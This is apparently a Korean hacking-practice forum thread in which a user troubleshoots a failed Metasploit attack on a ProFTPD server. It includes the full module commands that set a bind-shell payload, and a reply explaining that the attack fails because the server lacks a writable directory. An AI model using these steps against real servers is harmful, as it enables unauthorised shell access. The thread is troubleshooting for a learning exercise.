|
|


22018, 1/1101 |
![]() |
![]() |
![]() |
![]() |
|
xhosa123 | ||||||
|
ftp 서버 공격 실습 중,,, | ||||||
|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=29802 [복사]
Hit : 8004 Date : 2012/12/01 10:30
|
|||||||
| ![]() |
| |
| 소스코드 레벨에서 보는 습관을 들이시면 금방 답이 나올 듯합니다! | 2012/12/01 | |
|
| 해당 에러를 출력하기 전에 어떤 ftp command를 실행하려고 시도했는지 확인해 보세욤 | 2012/12/01 | |
|
| xhosa123 | ㄴ멍멍 msf exploit(proftp_sreplace) > use exploit/linux/ftp/proftp_sreplace msf exploit(proftp_sreplace) > set TARGET 2 TARGET => 2 msf exploit(proftp_sreplace) > set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD => linux/x86/shell_bind_tcp msf exploit(proftp_sreplace) > set RHOST RHOST => msf exploit(proftp_sreplace) > set WRITABLE /root WRITABLE => /root msf exploit(proftp_sreplace) > exploit 이렇게 명령어를 줬는데 좋지않은 영어실력으로 해석해보니 사용중인 ftp경로가 없다고 나오네요.. 경로를 만들어주고 다시 시도해봐야겠어요. 감사합니다 |
2012/12/01 | |
| 아 제가 말씀드린 커맨드란, 메타스플로잇 커맨드가 아닌 ftp 서버측에 실행하는 커맨드 즉, exploit/linux/ftp/proftp_sreplace 소스파일 내에 명시된 부분을 말한 것입니당 그리고 WRITABLE은 ftp 공격에서 흔히 요구되는 "쓰기 권한이 있는 디렉토리"를 말하는 것 같네요 /root라고 하면 쓰기 권한에 충족되지 않을 것 같습니다. http://www.exploit-db.com/exploits/16852/ 소스를 잠시 보니 "CWD /root"라는 명령을 실행하게 되는데, /root라는 디렉토리가 없으므로 Unable to get current working directory 에러가 나는 것 같네요 최근 ftp 서버들은 chroot가 적용되기 때문에 상위경로인 /root가 없다고 나오는 것일 겁니다 |
2012/12/01 | |
|
| xhosa123 | 그럼 쓰기가능한경로를 적어줘야하나요? | 2012/12/01 | |
| xhosa123 | 예를들어서어떤경로를적어줘야하나요? | 2012/12/01 | |
| 이정도는 직접 하실 수 있을 것 같은데요..~! | 2012/12/05 | |
|
|